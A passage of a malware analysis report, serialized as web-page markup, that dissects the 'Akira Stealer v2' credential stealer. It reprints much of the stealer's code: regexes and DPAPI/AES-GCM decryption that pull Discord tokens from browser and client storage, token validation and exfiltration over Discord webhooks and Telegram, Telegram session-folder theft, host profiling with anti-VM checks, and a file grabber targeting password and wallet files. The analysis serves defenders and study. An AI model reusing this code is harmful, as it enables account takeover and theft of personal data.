[\n",[102,12545,12546],{"class":104,"line":329},[102,12547,12548],{},"    [f\"{self.ROAMING}/Discord\", \"/Local Storage/leveldb\"],\n",[102,12550,12551],{"class":104,"line":346},[102,12552,12553],{},"    [f\"{self.ROAMING}/Lightcord\", \"/Local Storage/leveldb\"],\n",[102,12555,12556],{"class":104,"line":650},[102,12557,7836],{},[102,12559,12560],{"class":104,"line":656},[102,12561,11913],{},[102,12563,12564],{"class":104,"line":662},[102,12565,7846],{"emptyLinePlaceholder":2180},[102,12567,12568],{"class":104,"line":668},[102,12569,12570],{},"# Chromium-based browser LevelDB directories\n",[102,12572,12573],{"class":104,"line":674},[102,12574,12575],{},"browserPaths = [\n",[102,12577,12578],{"class":104,"line":680},[102,12579,12580],{},"    [f\"{self.ROAMING}/Opera Software/Opera GX Stable\", \"opera.exe\", \"/Local Storage/leveldb\", ...],\n",[102,12582,12583],{"class":104,"line":9019},[102,12584,12585],{},"    [f\"{self.LOCAL}/Google/Chrome/User Data\", \"chrome.exe\", \"/Default/Local Storage/leveldb\", ...],\n",[102,12587,12588],{"class":104,"line":9025},[102,12589,7836],{},[102,12591,12592],{"class":104,"line":9031},[102,12593,11913],{},[1255,12595,12596,12605],{},[1258,12597,12598,12601,12602,1014],{},[251,12599,12600],{},"Discord Paths"," target official and unofficial Discord clients under ",[63,12603,12604],{},"%APPDATA%",[1258,12606,12607,12610],{},[251,12608,12609],{},"Browser Paths"," cover popular browsers’ user data folders, including subfolders for local storage and extensions.",[12,12612,12613],{},"Threads are spawned for each entry:",[56,12615,12617],{"className":8482,"code":12616,"language":8484,"meta":65,"style":65},"for patt in browserPaths:\n    t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n    t.start()\nfor patt in discord_paths:\n    t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n    
t.start()\n",[63,12618,12619,12624,12629,12634,12639,12644],{"__ignoreMap":65},[102,12620,12621],{"class":104,"line":105},[102,12622,12623],{},"for patt in browserPaths:\n",[102,12625,12626],{"class":104,"line":111},[102,12627,12628],{},"    t = Thread(target=self.get_btoken, args=[patt[0], patt[2]])\n",[102,12630,12631],{"class":104,"line":329},[102,12632,12633],{},"    t.start()\n",[102,12635,12636],{"class":104,"line":346},[102,12637,12638],{},"for patt in discord_paths:\n",[102,12640,12641],{"class":104,"line":650},[102,12642,12643],{},"    t = Thread(target=self.get_discord, args=[patt[0], patt[1]])\n",[102,12645,12646],{"class":104,"line":656},[102,12647,12633],{},[12,12649,12650],{},"This threading model maximizes I/O throughput, probing dozens of directories concurrently.",[186,12652,12654],{"id":12653},"_792-token-extraction-logic","7.9.2 Token Extraction Logic",[12,12656,192],{},[12,12658,12659],{},[251,12660,12661],{},"Plaintext Token Scraping from Browsers",[12,12663,12664,12667,12668,4598,12671,12674],{},[63,12665,12666],{},"get_btoken(path, arg)"," navigates to each LevelDB folder and inspects ",[63,12669,12670],{},".log",[63,12672,12673],{},".ldb"," files:",[56,12676,12678],{"className":8482,"code":12677,"language":8484,"meta":65,"style":65},"for file in os.listdir(path + arg):\n    if file.endswith((\".log\", \".ldb\")):\n        for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n            for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n                tokens = re.findall(regex, line)\n                for token in tokens:\n                    self.tokens.append(token)\n                    self.cehckToken(token)\n",[63,12679,12680,12685,12690,12695,12700,12705,12710,12715],{"__ignoreMap":65},[102,12681,12682],{"class":104,"line":105},[102,12683,12684],{},"for file in os.listdir(path + arg):\n",[102,12686,12687],{"class":104,"line":111},[102,12688,12689],{},"    if file.endswith((\".log\", 
\".ldb\")):\n",[102,12691,12692],{"class":104,"line":329},[102,12693,12694],{},"        for line in open(f\"{path}{arg}/{file}\", errors=\"ignore\"):\n",[102,12696,12697],{"class":104,"line":346},[102,12698,12699],{},"            for regex in (r\"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}\", r\"mfa\\.[\\w-]{80,95}\"):\n",[102,12701,12702],{"class":104,"line":650},[102,12703,12704],{},"                tokens = re.findall(regex, line)\n",[102,12706,12707],{"class":104,"line":656},[102,12708,12709],{},"                for token in tokens:\n",[102,12711,12712],{"class":104,"line":662},[102,12713,12714],{},"                    self.tokens.append(token)\n",[102,12716,12717],{"class":104,"line":668},[102,12718,12719],{},"                    self.cehckToken(token)\n",[1255,12721,12722,12731,12739],{},[1258,12723,12724,12730],{},[251,12725,12726,12727],{},"Regex ",[63,12728,12729],{},"[\\w-]{24}\\.[\\w-]{6}\\.[\\w-]{25,110}"," matches standard Discord tokens.",[1258,12732,12733,12738],{},[251,12734,12726,12735],{},[63,12736,12737],{},"mfa\\.[\\w-]{80,95}"," captures MFA tokens.",[1258,12740,12741,12742,12745],{},"Deduplication is implicit: tokens stored in ",[63,12743,12744],{},"self.tokens"," before validation.",[12,12747,12748],{},[251,12749,12750],{},"Encrypted Token Decryption in Discord Client",[12,12752,12753,12754,12756,12757,12759,12760,12763],{},"Discord’s client encrypts Local Storage entries under DPAPI, prefaced by ",[63,12755,10491],{}," or ",[63,12758,10494],{},". 
",[63,12761,12762],{},"get_discord(path, arg)"," handles this:",[56,12765,12767],{"className":8482,"code":12766,"language":8484,"meta":65,"style":65},"# Read Local State to obtain encrypted master key\nwith open(path + \"/Local State\", 'r') as f:\n    local_state = json.load(f)\nencrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\nmaster_key = self.CryptUnprotectData(encrypted_key)\n\n# Iterate LevelDB files for Base64 payloads\nfor file in os.listdir(path + arg):\n    if file.endswith((\".log\", \".ldb\")):\n        for line in open(f\"{path}{arg}/{file}\"):\n            for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n                ciphertext = b64decode(token_part)\n                token = self.decrypt_value(ciphertext, master_key)\n                self.tokens.append(token)\n                self.cehckToken(token)\n",[63,12768,12769,12774,12779,12783,12788,12793,12797,12802,12806,12810,12815,12820,12825,12830,12835],{"__ignoreMap":65},[102,12770,12771],{"class":104,"line":105},[102,12772,12773],{},"# Read Local State to obtain encrypted master key\n",[102,12775,12776],{"class":104,"line":111},[102,12777,12778],{},"with open(path + \"/Local State\", 'r') as f:\n",[102,12780,12781],{"class":104,"line":329},[102,12782,11089],{},[102,12784,12785],{"class":104,"line":346},[102,12786,12787],{},"encrypted_key = b64decode(local_state['os_crypt']['encrypted_key'])[5:]\n",[102,12789,12790],{"class":104,"line":650},[102,12791,12792],{},"master_key = self.CryptUnprotectData(encrypted_key)\n",[102,12794,12795],{"class":104,"line":656},[102,12796,7846],{"emptyLinePlaceholder":2180},[102,12798,12799],{"class":104,"line":662},[102,12800,12801],{},"# Iterate LevelDB files for Base64 payloads\n",[102,12803,12804],{"class":104,"line":668},[102,12805,12684],{},[102,12807,12808],{"class":104,"line":674},[102,12809,12689],{},[102,12811,12812],{"class":104,"line":680},[102,12813,12814],{},"        for line in 
open(f\"{path}{arg}/{file}\"):\n",[102,12816,12817],{"class":104,"line":9019},[102,12818,12819],{},"            for token_part in re.findall(r\"dQw4w9WgXcQ:([A-Za-z0-9+/=]+)\", line):\n",[102,12821,12822],{"class":104,"line":9025},[102,12823,12824],{},"                ciphertext = b64decode(token_part)\n",[102,12826,12827],{"class":104,"line":9031},[102,12828,12829],{},"                token = self.decrypt_value(ciphertext, master_key)\n",[102,12831,12832],{"class":104,"line":9037},[102,12833,12834],{},"                self.tokens.append(token)\n",[102,12836,12837],{"class":104,"line":9043},[102,12838,12839],{},"                self.cehckToken(token)\n",[1255,12841,12842,12851],{},[1258,12843,12844,12847,12848,12850],{},[251,12845,12846],{},"Master Key Recovery",": Strips the 5-byte DPAPI header, then calls ",[63,12849,11155],{}," (wrapping Windows DPAPI) to decrypt the AES-GCM key.",[1258,12852,12853,12856,12857,12860,12861,12864,12865],{},[251,12854,12855],{},"Payload Parsing",": Tokens are prefixed with ",[63,12858,12859],{},"dQw4w9WgXcQ:"," (an attacker-chosen marker). 
After Base64 decoding, ",[63,12862,12863],{},"decrypt_value()"," splits IV and ciphertext:",[56,12866,12868],{"className":8482,"code":12867,"language":8484,"meta":65,"style":65},"def decrypt\\_value(buff, master\\_key):\niv = buff\\[3:15]\npayload = buff\\[15:]\ncipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\nreturn cipher.decrypt(payload)\\[:-16].decode()\n",[63,12869,12870,12875,12880,12885,12890],{"__ignoreMap":65},[102,12871,12872],{"class":104,"line":105},[102,12873,12874],{},"def decrypt\\_value(buff, master\\_key):\n",[102,12876,12877],{"class":104,"line":111},[102,12878,12879],{},"iv = buff\\[3:15]\n",[102,12881,12882],{"class":104,"line":329},[102,12883,12884],{},"payload = buff\\[15:]\n",[102,12886,12887],{"class":104,"line":346},[102,12888,12889],{},"cipher = AES.new(master\\_key, AES.MODE\\_GCM, iv)\n",[102,12891,12892],{"class":104,"line":650},[102,12893,12894],{},"return cipher.decrypt(payload)\\[:-16].decode()\n",[186,12896,12898],{"id":12897},"_793-token-validation-exfiltration","7.9.3 Token Validation & Exfiltration",[12,12900,192],{},[12,12902,12903],{},"Each extracted token is validated via live API call:",[56,12905,12908],{"className":12906,"code":12907,"language":61},[59],"headers = {\"Authorization\": token}\nresp = requests.get(\"https://discordapp.com/api/v9/users/@me\", headers=headers)\nif resp.status_code == 200:\n    self.cehckToken(token)\n",[63,12909,12907],{"__ignoreMap":65},[1255,12911,12912],{},[1258,12913,12914,805,12917,12920,12921,12924,12925],{},[251,12915,12916],{},"On success",[63,12918,12919],{},"cehckToken()"," determines whether to send via Telegram (",[63,12922,12923],{},"useTg=True",") or Discord webhook:",[56,12926,12928],{"className":8482,"code":12927,"language":8484,"meta":65,"style":65},"if useTg:\nself.sendTokenTg(token)\nelse:\nself.send\\_embed(token)\n",[63,12929,12930,12935,12940,12945],{"__ignoreMap":65},[102,12931,12932],{"class":104,"line":105},[102,12933,12934],{},"if 
useTg:\n",[102,12936,12937],{"class":104,"line":111},[102,12938,12939],{},"self.sendTokenTg(token)\n",[102,12941,12942],{"class":104,"line":329},[102,12943,12944],{},"else:\n",[102,12946,12947],{"class":104,"line":346},[102,12948,12949],{},"self.send\\_embed(token)\n",[1255,12951,12952],{},[1258,12953,12954,12959],{},[251,12955,12956],{},[63,12957,12958],{},"send_embed"," crafts a rich Discord embed containing user metadata (username, discriminator, email, Nitro status, billing info) using fields from",[56,12961,12964],{"className":12962,"code":12963,"language":61},[59],"user_json = requests.get(...).json()\nusername = user_json[\"username\"]\nid = user_json[\"id\"]\n# embed fields: token, email, phone, IP, flags, Nitro, billing\n",[63,12965,12963],{"__ignoreMap":65},[1255,12967,12968],{},[1258,12969,12970,12975],{},[251,12971,12972],{},[63,12973,12974],{},"sendTokenTg"," sends a plain-text summary over Telegram API.",[186,12977,12979],{"id":12978},"_794-telegram-session-harvesting","7.9.4 Telegram Session Harvesting",[12,12981,192],{},[12,12983,12984],{},"Beyond Discord tokens, the stealer grabs Telegram Desktop sessions:",[56,12986,12988],{"className":8482,"code":12987,"language":8484,"meta":65,"style":65},"@staticmethod\ndef steal_telegram():\n    src = f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n    Utils.TaskKill(\"telegram.exe\")\n    shutil.copytree(src, os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[63,12989,12990,12994,12999,13004,13009],{"__ignoreMap":65},[102,12991,12992],{"class":104,"line":105},[102,12993,8971],{},[102,12995,12996],{"class":104,"line":111},[102,12997,12998],{},"def steal_telegram():\n",[102,13000,13001],{"class":104,"line":329},[102,13002,13003],{},"    src = f\"{os.getenv('APPDATA')}/Telegram Desktop/tdata\"\n",[102,13005,13006],{"class":104,"line":346},[102,13007,13008],{},"    Utils.TaskKill(\"telegram.exe\")\n",[102,13010,13011],{"class":104,"line":650},[102,13012,13013],{},"    shutil.copytree(src, 
os.path.join(Utils.get_temp_folder(), \"Telegram\"))\n",[1255,13015,13016,13022,13031],{},[1258,13017,13018,13021],{},[251,13019,13020],{},"Process Termination",": Ensures file locks are released.",[1258,13023,13024,13027,13028,13030],{},[251,13025,13026],{},"Recursive Copy",": Steals ",[63,13029,12264],{}," folder, including user sessions, contacts, and cached messages.",[1258,13032,13033,13035,13036,13039],{},[251,13034,5353],{},": The stolen folder is zipped and uploaded via ",[63,13037,13038],{},"sendFilesTG()",", with the download link embedded in a Telegram message.",[12,13041,13042,13043,13045],{},"Akira Stealer’s ",[63,13044,5337],{}," module combines regex-based scraping, DPAPI-backed AES-GCM decryption, live API validation, and multi-protocol exfiltration (webhook + Telegram) to deliver a seamless account takeover capability across both Discord and Telegram platforms.",[41,13047,13049],{"id":13048},"_710-system-profiling","7.10 System Profiling",[12,13051,47],{},[12,13053,13054,13055,13058],{},"Akira Stealer v2 incorporates an extensive system profiling phase to gather host metadata, environment attributes, and network details. This information is collated in the ",[63,13056,13057],{},"Data"," class and later packaged with exfiltrated credentials. 
Below, we break down the profiling logic with direct code references.",[186,13060,13062,13063,13065],{"id":13061},"_7101-data-class-initialization","7.10.1 ",[63,13064,13057],{}," Class Initialization",[12,13067,192],{},[12,13069,13070,13071,13073],{},"On startup, an instance of ",[63,13072,13057],{}," is created:",[56,13075,13077],{"className":8482,"code":13076,"language":8484,"meta":65,"style":65},"class Data:\n    def __init__(self):\n        self.username = os.getlogin()\n        self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n        self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n        ...\n        self.ip = requests.get(url=\"https://api.ipify.org\").text\n        ipdata = json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n        self.country = ipdata.get(\"country\")\n        self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[63,13078,13079,13084,13089,13094,13099,13104,13109,13114,13119,13124],{"__ignoreMap":65},[102,13080,13081],{"class":104,"line":105},[102,13082,13083],{},"class Data:\n",[102,13085,13086],{"class":104,"line":111},[102,13087,13088],{},"    def __init__(self):\n",[102,13090,13091],{"class":104,"line":329},[102,13092,13093],{},"        self.username = os.getlogin()\n",[102,13095,13096],{"class":104,"line":346},[102,13097,13098],{},"        self.computerName = os.getenv(\"computername\") or \"Unable to get computer name\"\n",[102,13100,13101],{"class":104,"line":650},[102,13102,13103],{},"        self.system_info = f\"Computer Name: {self.computerName}\\n...\"\n",[102,13105,13106],{"class":104,"line":656},[102,13107,13108],{},"        ...\n",[102,13110,13111],{"class":104,"line":662},[102,13112,13113],{},"        self.ip = requests.get(url=\"https://api.ipify.org\").text\n",[102,13115,13116],{"class":104,"line":668},[102,13117,13118],{},"        ipdata = 
json.loads(requests.post(url=f\"http://ip-api.com/json/{self.ip}\").text)\n",[102,13120,13121],{"class":104,"line":674},[102,13122,13123],{},"        self.country = ipdata.get(\"country\")\n",[102,13125,13126],{"class":104,"line":680},[102,13127,13128],{},"        self.countryCode = ipdata.get(\"countryCode\", \"\").lower()\n",[1255,13130,13131,13144],{},[1258,13132,13133,13136,13137,4598,13140,13143],{},[251,13134,13135],{},"Username & Hostname:"," Retrieved via ",[63,13138,13139],{},"os.getlogin()",[63,13141,13142],{},"COMPUTERNAME"," environment variable.",[1258,13145,13146,13149,13150,13153,13154,13156],{},[251,13147,13148],{},"IP Address:"," Fetched with ",[63,13151,13152],{},"requests.get(\"https://api.ipify.org\")",", then geolocated via ",[63,13155,9317],{}," for country and ISO code.",[186,13158,13160],{"id":13159},"_7102-os-and-hardware-enumeration","7.10.2 OS and Hardware Enumeration",[12,13162,192],{},[12,13164,13165],{},"Using Windows Management Instrumentation (WMI) commands:",[56,13167,13169],{"className":8482,"code":13168,"language":8484,"meta":65,"style":65},"# Operating System\nself.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n# Total Physical Memory\nself.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n# BIOS UUID\nself.uuid = subprocess.run('wmic csproduct get uuid', ...)\n# CPU Identifier\nself.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n# GPU Name\nself.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n# Windows Product Key\nself.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", ...)\n",[63,13170,13171,13176,13181,13186,13191,13196,13201,13206,13211,13216,13221,13226],{"__ignoreMap":65},[102,13172,13173],{"class":104,"line":105},[102,13174,13175],{},"# 
Operating System\n",[102,13177,13178],{"class":104,"line":111},[102,13179,13180],{},"self.computerOS = subprocess.run('wmic os get Caption', shell=True, capture_output=True).stdout\n",[102,13182,13183],{"class":104,"line":329},[102,13184,13185],{},"# Total Physical Memory\n",[102,13187,13188],{"class":104,"line":346},[102,13189,13190],{},"self.totalMemory = subprocess.run('wmic computersystem get totalphysicalmemory', ...)\n",[102,13192,13193],{"class":104,"line":650},[102,13194,13195],{},"# BIOS UUID\n",[102,13197,13198],{"class":104,"line":656},[102,13199,13200],{},"self.uuid = subprocess.run('wmic csproduct get uuid', ...)\n",[102,13202,13203],{"class":104,"line":662},[102,13204,13205],{},"# CPU Identifier\n",[102,13207,13208],{"class":104,"line":668},[102,13209,13210],{},"self.cpu = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:System...\\Processor_Identifier'\", ...)\n",[102,13212,13213],{"class":104,"line":674},[102,13214,13215],{},"# GPU Name\n",[102,13217,13218],{"class":104,"line":680},[102,13219,13220],{},"self.gpu = subprocess.run('wmic path win32_VideoController get name', ...)\n",[102,13222,13223],{"class":104,"line":9019},[102,13224,13225],{},"# Windows Product Key\n",[102,13227,13228],{"class":104,"line":9025},[102,13229,13230],{},"self.productKey = subprocess.run(\"powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\\\Microsoft\\\\Windows NT...SoftwareProtectionPlatform' -Name BackupProductKeyDefault\", ...)\n",[12,13232,13233,13234,13237],{},"Results are parsed to human-readable strings (",[63,13235,13236],{},"strip()",", index operations) and concatenated into:",[56,13239,13241],{"className":8482,"code":13240,"language":8484,"meta":65,"style":65},"self.system_info = (\n    f\"Computer Name: {self.computerName}\\n\"\n    f\"Total Memory: {self.totalMemory}\\n\"\n    f\"CPU: {self.cpu}\\n\"\n    f\"GPU: {self.gpu}\\n\"\n    f\"Product Key: 
{self.productKey}\"\n)\n",[63,13242,13243,13248,13253,13258,13263,13268,13273],{"__ignoreMap":65},[102,13244,13245],{"class":104,"line":105},[102,13246,13247],{},"self.system_info = (\n",[102,13249,13250],{"class":104,"line":111},[102,13251,13252],{},"    f\"Computer Name: {self.computerName}\\n\"\n",[102,13254,13255],{"class":104,"line":329},[102,13256,13257],{},"    f\"Total Memory: {self.totalMemory}\\n\"\n",[102,13259,13260],{"class":104,"line":346},[102,13261,13262],{},"    f\"CPU: {self.cpu}\\n\"\n",[102,13264,13265],{"class":104,"line":650},[102,13266,13267],{},"    f\"GPU: {self.gpu}\\n\"\n",[102,13269,13270],{"class":104,"line":656},[102,13271,13272],{},"    f\"Product Key: {self.productKey}\"\n",[102,13274,13275],{"class":104,"line":662},[102,13276,9238],{},[186,13278,13280],{"id":13279},"_7103-vm-detection-anti-sandbox-checks","7.10.3 VM Detection & Anti-Sandbox Checks",[12,13282,192],{},[12,13284,13285,13286,13288],{},"Before deep profiling, the malware invokes ",[63,13287,8655],{}," to detect virtualization or analysis environments:",[56,13290,13292],{"className":8482,"code":13291,"language":8484,"meta":65,"style":65},"if VmProtect.isVM(1):\n    sys.exit()\n",[63,13293,13294,13299],{"__ignoreMap":65},[102,13295,13296],{"class":104,"line":105},[102,13297,13298],{},"if VmProtect.isVM(1):\n",[102,13300,13301],{"class":104,"line":111},[102,13302,13303],{},"    sys.exit()\n",[12,13305,13306],{},"Key checks include:",[1255,13308,13309,13315,13321,13327],{},[1258,13310,13311,13314],{},[251,13312,13313],{},"Registry Keys & Driver Descriptors",": Queries virtualization-related registry entries.",[1258,13316,13317,13320],{},[251,13318,13319],{},"Blacklisted UUIDs & Computer Names",": Matches against known VM fingerprints.",[1258,13322,13323,13326],{},[251,13324,13325],{},"HTTP Simulation",": Attempts to connect to a nonexistent domain under HTTPS.",[1258,13328,13329,13332,13333,805,13336,805,13339,1014],{},[251,13330,13331],{},"Process Blacklist",": Spawns a 
background thread to kill tools like ",[63,13334,13335],{},"wireshark",[63,13337,13338],{},"ollydbg",[63,13340,13341],{},"ida64",[186,13343,13345],{"id":13344},"_7104-packaging-transmission","7.10.4 Packaging & Transmission",[12,13347,192],{},[12,13349,13350,13351,13354],{},"The collected ",[63,13352,13353],{},"system_info",", IP, and country flag are embedded in the webhook payload headers:",[56,13356,13358],{"className":8482,"code":13357,"language":8484,"meta":65,"style":65},"webhook_payload = {\n    \"embeds\": [{\n        \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n        \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n        \"fields\": [...]\n    }]\n}\nrequests.post(self.webhook_url, json=webhook_payload)\n",[63,13359,13360,13365,13370,13375,13380,13385,13390,13394],{"__ignoreMap":65},[102,13361,13362],{"class":104,"line":105},[102,13363,13364],{},"webhook_payload = {\n",[102,13366,13367],{"class":104,"line":111},[102,13368,13369],{},"    \"embeds\": [{\n",[102,13371,13372],{"class":104,"line":329},[102,13373,13374],{},"        \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n",[102,13376,13377],{"class":104,"line":346},[102,13378,13379],{},"        \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n",[102,13381,13382],{"class":104,"line":650},[102,13383,13384],{},"        \"fields\": [...]\n",[102,13386,13387],{"class":104,"line":656},[102,13388,13389],{},"    }]\n",[102,13391,13392],{"class":104,"line":662},[102,13393,6410],{},[102,13395,13396],{"class":104,"line":668},[102,13397,13398],{},"requests.post(self.webhook_url, json=webhook_payload)\n",[1255,13400,13401,13407],{},[1258,13402,13403,13406],{},[251,13404,13405],{},"Flag Emoji",": Derived from ISO country code.",[1258,13408,13409,13412],{},[251,13410,13411],{},"Fields",": Include counts of stolen passwords, cookies, etc., but the system info is 
in the embed description for immediate context.",[12,13414,13415,13418],{},[251,13416,13417],{},"Summary:","\nSystem profiling in Akira Stealer v2 gathers comprehensive host and network data via WMI commands, environment variables, and IP geolocation. Coupled with VM detection and tool-killing routines, this ensures the attacker has a full snapshot of the compromised environment, enhancing targeted follow-up actions and filtering out analysis sandboxes.",[41,13420,13422,13423,1289],{"id":13421},"_711-file-grabber-class-utilssteal_files","7.11 File Grabber (Class: ",[63,13424,13425],{},"Utils.steal_files",[12,13427,47],{},[12,13429,13430],{},"Beyond browser data and tokens, Akira also attempts to extract valuable user-generated content—such as documents, spreadsheets, private notes, and cryptographic key files. The File Grabber module is responsible for this task. It operates by scanning high-value directories for common file types and patterns, then silently adding them to the exfiltration bundle. What makes this module especially dangerous is its simplicity and focus: it doesn’t attempt to crawl the entire file system. Instead, it targets specific, high-probability locations where sensitive files are typically stored. These include the Desktop, Documents, Downloads, and OneDrive directories—each relative to the user's home path. This focused approach improves both speed and stealth, reducing the likelihood of detection during the scan. It also avoids alerting the user by not accessing system or protected directories. 
Once files of interest are located, they are copied into a temporary folder, optionally renamed or grouped, and later compressed into the final ZIP archive that’s uploaded in the exfiltration phase.",[186,13432,13434],{"id":13433},"_7111-target-directories-enumeration","7.11.1 Target Directories Enumeration",[12,13436,192],{},[12,13438,13439],{},"The stealer focuses on four high-yield folders:",[56,13441,13443],{"className":8482,"code":13442,"language":8484,"meta":65,"style":65},"searchFolders = [\n    \"Desktop\",\n    \"Documents\",\n    \"Downloads\",\n    \"OneDrive\"\n]\n",[63,13444,13445,13450,13455,13460,13465,13470],{"__ignoreMap":65},[102,13446,13447],{"class":104,"line":105},[102,13448,13449],{},"searchFolders = [\n",[102,13451,13452],{"class":104,"line":111},[102,13453,13454],{},"    \"Desktop\",\n",[102,13456,13457],{"class":104,"line":329},[102,13458,13459],{},"    \"Documents\",\n",[102,13461,13462],{"class":104,"line":346},[102,13463,13464],{},"    \"Downloads\",\n",[102,13466,13467],{"class":104,"line":650},[102,13468,13469],{},"    \"OneDrive\"\n",[102,13471,13472],{"class":104,"line":656},[102,13473,11913],{},[12,13475,13476],{},"Each folder is interpreted relative to the victim’s home directory:",[56,13478,13480],{"className":8482,"code":13479,"language":8484,"meta":65,"style":65},"for folder in searchFolders:\n    current_path = os.path.join(os.environ['USERPROFILE'], folder)\n    if os.path.exists(current_path):\n        # proceed to scan\n",[63,13481,13482,13487,13492,13497],{"__ignoreMap":65},[102,13483,13484],{"class":104,"line":105},[102,13485,13486],{},"for folder in searchFolders:\n",[102,13488,13489],{"class":104,"line":111},[102,13490,13491],{},"    current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[102,13493,13494],{"class":104,"line":329},[102,13495,13496],{},"    if os.path.exists(current_path):\n",[102,13498,13499],{"class":104,"line":346},[102,13500,13501],{},"        # proceed to 
scan\n",[186,13503,13505],{"id":13504},"_7112-keyword-extension-filtering","7.11.2 Keyword & Extension Filtering",[12,13507,192],{},[12,13509,13510],{},[251,13511,13512],{},"Keyword List",[12,13514,13515],{},"A predefined set of substrings guides file selection. Only filenames containing at least one keyword are considered:",[56,13517,13519],{"className":8482,"code":13518,"language":8484,"meta":65,"style":65},"keywordsFiles = [\n    \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n    \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n]\n",[63,13520,13521,13526,13531,13536],{"__ignoreMap":65},[102,13522,13523],{"class":104,"line":105},[102,13524,13525],{},"keywordsFiles = [\n",[102,13527,13528],{"class":104,"line":111},[102,13529,13530],{},"    \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n",[102,13532,13533],{"class":104,"line":329},[102,13534,13535],{},"    \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n",[102,13537,13538],{"class":104,"line":346},[102,13539,11913],{},[1255,13541,13542,13558],{},[1258,13543,13544,13547,13548,13551,13552,4598,13555,1014],{},[251,13545,13546],{},"Partial Matches",": Keywords like ",[63,13549,13550],{},"passw"," capture both ",[63,13553,13554],{},"passwords.txt",[63,13556,13557],{},"passw_backup.docx",[1258,13559,13560,13563],{},[251,13561,13562],{},"Broad Coverage",": Encompasses authentication, wallet, crypto, and token-related terms.",[186,13565,13567],{"id":13566},"_7113-allowed-file-types","7.11.3 Allowed File Types",[12,13569,192],{},[12,13571,13572],{},"To minimize noise, a whitelist of extensions is enforced:",[56,13574,13576],{"className":8482,"code":13575,"language":8484,"meta":65,"style":65},"allowed_extensions = [\n    \".txt\", \".doc\", \".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n    \".jpg\", \".png\"\n]\n",[63,13577,13578,13583,13588,13593],{"__ignoreMap":65},[102,13579,13580],{"class":104,"line":105},[102,13581,13582],{},"allowed_extensions = 
[\n",[102,13584,13585],{"class":104,"line":111},[102,13586,13587],{},"    \".txt\", \".doc\", \".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n",[102,13589,13590],{"class":104,"line":329},[102,13591,13592],{},"    \".jpg\", \".png\"\n",[102,13594,13595],{"class":104,"line":346},[102,13596,11913],{},[186,13598,13600],{"id":13599},"_7113-size-constraint","7.11.3 Size Constraint",[12,13602,192],{},[12,13604,13605],{},"Files larger than 2 megabytes are skipped to optimize exfiltration speed and avoid large transfers:",[56,13607,13609],{"className":8482,"code":13608,"language":8484,"meta":65,"style":65},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\nif file_size_mb \u003C= 2:\n    # eligible for copy\n",[63,13610,13611,13616,13621],{"__ignoreMap":65},[102,13612,13613],{"class":104,"line":105},[102,13614,13615],{},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\n",[102,13617,13618],{"class":104,"line":111},[102,13619,13620],{},"if file_size_mb \u003C= 2:\n",[102,13622,13623],{"class":104,"line":329},[102,13624,13625],{},"    # eligible for copy\n",[186,13627,13629],{"id":13628},"_7114-recursive-scanning-copy-logic","7.11.4 Recursive Scanning & Copy Logic",[12,13631,192],{},[12,13633,13634],{},"Once the high-value directories have been identified, Akira initiates a recursive scanning routine to traverse subfolders and locate files matching specific keywords and extensions. This phase is built for precision and stealth: only files that match pre-defined criteria—such as filenames containing sensitive keywords and approved filetypes—are considered. The logic ensures that only relevant, user-generated content is exfiltrated. It ignores system files, caches, and binaries, and limits the size of any single file to 2 MB to reduce upload size and detection risk. This scanning method is silent, efficient, and optimized for stealthy data theft in real-world environments. 
By copying matching files into a staging folder and maintaining a list of what was taken, Akira prepares the content for bundling and exfiltration—while minimizing duplication and operational noise.",[12,13636,13637,13638,13641],{},"The core routine ",[63,13639,13640],{},"steal_files()"," operates as follows:",[56,13643,13645],{"className":8482,"code":13644,"language":8484,"meta":65,"style":65},"@staticmethod\ndef steal_files():\n    stolen_files = set()\n    temp_folder = Utils.get_temp_folder()\n\n    for folder in searchFolders:\n        current_path = os.path.join(os.environ['USERPROFILE'], folder)\n        if os.path.exists(current_path):\n            for root, _, files in os.walk(current_path):\n                for file in files:\n                    lower = file.lower()\n                    # Keyword check\n                    if any(keyword in lower for keyword in keywordsFiles):\n                        ext = os.path.splitext(lower)[1]\n                        # Extension and size check\n                        if ext in allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n                            # Prepare destination\n                            files_dir = os.path.join(temp_folder, \"Files\")\n                            os.makedirs(files_dir, exist_ok=True)\n           